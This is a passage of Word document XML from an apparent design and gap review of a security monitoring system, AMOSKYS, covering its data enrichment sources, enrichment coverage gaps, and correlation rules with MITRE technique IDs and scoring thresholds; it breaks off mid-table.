        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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07059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Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="04E131A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A8975" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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GeoIP</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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80A46" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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src_ip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dst_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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EDED2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 xml:space="preserve">8 fields (country, city,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lat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lon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× 2)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6EB65" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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MaxMind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GeoLite2-City</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="0859793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A6A5F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ASN</w:t>
            </w:r>
          </w:p>
        </w:tc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F99C7" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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src_ip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dst_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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B23EA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 xml:space="preserve">8 fields (number, org,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network_type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× 2)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D7976" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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MaxMind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GeoLite2-ASN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="2CDDDCF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BE22F" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ThreatIntel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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10F8B" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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src_ip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dst_ip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>, domain, hash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E4C0B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4 fields (match, source, severity)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82845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SQLite (local CSV)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56720FBF" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>KEY PROPERTY: Enrichment NEVER overwrites raw values. Only ADDS new fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D2F870" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>5.3 Enrichment Coverage Matrix</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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2"/>
        <w:gridCol w:w="1816"/>
        <w:gridCol w:w="2361"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="2064"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="67546A7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1B2A4A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1C9A9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Attribute Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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244AB" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto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Enrichable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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119A7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Currently Enriched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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20B16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Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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028A8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Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="3BA060F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4D18A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Network IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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75619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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc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EFB69" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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GeoIP+ASN+TI</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="E8F8F0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FCE6D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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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EF8EC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  <w:tr w:rsidR="00501EAB" w14:paraId="454F616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46E13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Domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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84ED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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc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B5084" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ThreatIntel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only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C9851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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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C3663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 xml:space="preserve">No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typosquatting</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="6B0BA9D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9C7A1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File Hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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C18F8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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc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6C5BF" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ThreatIntel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only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D208E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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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6BE35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SHA256 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="0CDCA2A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F1B28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URLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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1B202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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc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6E6D1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NOT enriched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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1D5F1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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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93540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E74C3C"/>
              </w:rPr>
              <w:t>GAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="0D537CA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8C8AC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User Context</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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72674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Partially</w:t>
            </w:r>
          </w:p>
        </w:tc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B2448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NOT enriched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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BA677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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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DE191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E74C3C"/>
              </w:rPr>
              <w:t>GAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="6BDBDA0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2BC35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Process Paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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B2268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Partially</w:t>
            </w:r>
          </w:p>
        </w:tc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3D1DC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NOT enriched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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6DC35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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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ABDB0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E74C3C"/>
              </w:rPr>
              <w:t>GAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="0B62334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76D18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Ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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120FE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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc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B59B5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NOT enriched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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D5FC0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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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F3147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E74C3C"/>
              </w:rPr>
              <w:t>GAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="01F2A1C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522DF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DNS Records</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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7B22F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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc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B8180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NOT enriched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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3EFD4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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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47A3F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E74C3C"/>
              </w:rPr>
              <w:t>GAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5433F494" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683AA396" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>5.4 Enrichment Gaps</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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8"/>
        <w:gridCol w:w="3376"/>
        <w:gridCol w:w="1841"/>
        <w:gridCol w:w="2915"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="2030F6C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1B2A4A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2AFD3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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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FEE91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Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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0245D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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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FEF02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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1CBFD0B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8A623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EN-01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A3EC4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URLs not enriched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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6CBEE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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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A446D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Malicious URLs missed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="384A6D1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671B2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EN-02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46725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User context not enriched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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5DA18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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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CBAE2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No baseline anomaly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1E95F83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79792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EN-03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E86D1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Binary reputation unchecked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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6E468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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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53382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Unknown malware passes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7D1928E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1194B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EN-04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449FA" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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MaxMind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monthly staleness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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7060F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P2</w:t>
            </w:r>
          </w:p>
        </w:tc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07299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Gaps between updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="73D83AA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21CA6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EN-05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1EF24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SHA256 only for hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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FDB98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P2</w:t>
            </w:r>
          </w:p>
        </w:tc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833CD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Older feeds unusable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="494F0A2F" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="78468E1A" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter 6: Correlation Engine (Phase 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C68444" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>6.1 Dual Correlation Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCCF21A" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AMOSKYS has TWO correlation systems: (1) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatCorrelator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (7 rules, stateful, behavioral). (2) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ScoreJunction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (3 rules, entity-buffered). Plus correlation/rules.py (8 rules) and advanced_rules.py (18 rules).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3070C1A3" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Rule Inventory — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatCorrelator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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9"/>
        <w:gridCol w:w="3197"/>
        <w:gridCol w:w="1546"/>
        <w:gridCol w:w="2060"/>
        <w:gridCol w:w="1598"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="50A3D29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1B2A4A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15D28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#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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FCAA8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Rule Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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E63EC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Window</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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C4D39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Confidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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B3A2D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MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="55B63A2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21F67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B8FA2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Lateral Movement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1EBD4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300s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103C7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0.80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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AA205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T1570</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="720DDBD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308E6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2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938A6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IoT Botnet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EEAA8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300s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D0B45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0.90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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6378D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T1570</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="634FC8A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782C1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3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FE0A2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Medical Device Attack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97B60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300s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EC127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0.85</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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4E69B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T1562</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="0026D05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1DB15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4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E6662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Industrial Sabotage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A8874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300s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1B596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0.90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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02778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T1482</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="598D36A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30705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5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14939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Data Exfiltration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2E1E8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300s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13EBA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0.75</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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016F2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T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="27A4023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689D3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6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21F5E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Insider Threat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A506F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300s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C92C2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0.70</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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6ED8D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T1078</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1A2B590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65A43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7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1AB75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Ransomware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B8FA8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300s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2E5F0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0.95</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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C1415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T1486</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C03FF19" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="105E1E7A" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Rule Inventory — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ScoreJunction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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9"/>
        <w:gridCol w:w="5073"/>
        <w:gridCol w:w="1660"/>
        <w:gridCol w:w="1798"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="3A06084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1B2A4A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3F13C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#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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A4624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Rule Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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1A786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Weight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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48E5B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Threat Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="20773F3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7A598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874FC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HIGH_CPU_SUSPICIOUS_PROCESS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CCD4D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0.7</w:t>
            </w:r>
          </w:p>
        </w:tc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CD013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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="5125FE4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12AC7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2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2C932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MEMORY_SPIKE_NEW_PROCESS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D3FC7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0.5</w:t>
            </w:r>
          </w:p>
        </w:tc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4B378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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="28EB84D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9A59E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3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3697A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NETWORK_SPIKE_SUSPICIOUS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24750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0.6</w:t>
            </w:r>
          </w:p>
        </w:tc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68150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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E5447CE" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3253A069" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>6.4 Scoring Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3DB3E3" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatCorrelator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: confidence += 0.3 per condition. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ScoreJunction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>total_score</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = sum(weight × 100). Thresholds: ≥80 CRITICAL, ≥60 HIGH, ≥40 MEDIUM, ≥20 LOW, &lt;20 BENIGN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532AD9D7" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>6.5 Correlation Gaps</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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8"/>
        <w:gridCol w:w="3376"/>
        <w:gridCol w:w="1841"/>
        <w:gridCol w:w="2915"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="405D950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1B2A4A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3E6CC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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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9E3D9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Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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6B71A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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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B2DEB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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1184E25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B3157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COR-01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0C3DA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19/26 rules have ZERO tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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65598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E74C3C"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc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E6210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Silent failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="4A0869C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C1E57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COR-02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4B750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Two engines, no unified scoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
